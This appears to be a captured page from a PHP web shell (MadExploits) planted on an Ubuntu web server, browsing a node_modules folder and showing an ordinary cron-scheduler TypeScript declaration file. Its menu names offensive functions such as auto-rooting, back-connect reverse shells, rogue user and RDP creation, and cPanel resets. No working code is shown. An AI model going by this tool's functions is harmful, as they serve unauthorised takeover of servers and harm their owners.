Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
croner /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
croner.d.ts
3.48
KB
-rw-rw-r--
croner.single.d.ts
53
B
-rw-rw-r--
date.d.ts
1.86
KB
-rw-rw-r--
pattern.d.ts
1.98
KB
-rw-rw-r--
timezone.d.ts
835
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : croner.d.ts
export default Cron; /** * - Cron scheduler options */ export type CronOptions = { /** * - Job is paused */ paused?: boolean; /** * - Job is about to be killed or killed */ kill?: boolean; /** * - Continue exection even if a unhandled error is thrown by triggered function */ catch?: boolean; /** * - Maximum nuber of executions */ maxRuns?: number; /** * - When to start running */ startAt?: string | Date; /** * - When to stop running */ stopAt?: string | Date; /** * - Time zone in Europe/Stockholm format */ timezone?: string; /** * - Used to pass any object to scheduled function */ context?: unknown; }; /** * Cron entrypoint * * @constructor * @param {string|Date} pattern - Input pattern, input date, or input ISO 8601 time string * @param {CronOptions|Function} [options] - Options * @param {Function} [func] - Function to be run each iteration of pattern * @returns {Cron} */ export function Cron(pattern: string | Date, options?: CronOptions | Function, func?: Function): Cron; export class Cron { /** * Cron entrypoint * * @constructor * @param {string|Date} pattern - Input pattern, input date, or input ISO 8601 time string * @param {CronOptions|Function} [options] - Options * @param {Function} [func] - Function to be run each iteration of pattern * @returns {Cron} */ constructor(pattern: string | Date, options?: CronOptions | Function, func?: Function); /** @type {CronOptions} */ options: CronOptions; once: CronDate; /** @type {CronPattern} */ pattern: CronPattern; fn: Function; private processOptions; /** * Find next runtime, based on supplied date. Strips milliseconds. * * @param {Date|string} [prev] - Date to start from * @returns {Date | null} - Next run time */ next(prev?: Date | string): Date | null; /** * Find next n runs, based on supplied date. Strips milliseconds. * * @param {number} n - Number of runs to enumerate * @param {Date|string} [previous] - Date to start from * @returns {Date[]} - Next n run times */ enumerate(n: number, previous?: Date | string): Date[]; /** * Is running? * @public * * @returns {boolean} - Running or not */ public running(): boolean; /** * Return previous run time * @public * * @returns {Date | null} - Previous run time */ public previous(): Date | null; private _next; /** * Returns number of milliseconds to next run * @public * * @param {Date} [prev] - Starting date, defaults to now * @returns {number | null} */ public msToNext(prev?: Date): number | null; /** * Stop execution * @public */ public stop(): void; /** * Pause executionR * @public * * @returns {boolean} - Wether pause was successful */ public pause(): boolean; /** * Pause execution * @public * * @returns {boolean} - Wether resume was successful */ public resume(): boolean; /** * Schedule a new job * @public * * @param {Function} func - Function to be run each iteration of pattern * @returns {Cron} */ public schedule(func: Function): Cron; currentTimeout: number; previousrun: CronDate; } import { CronDate } from "./date.js"; import { CronPattern } from "./pattern.js";
Close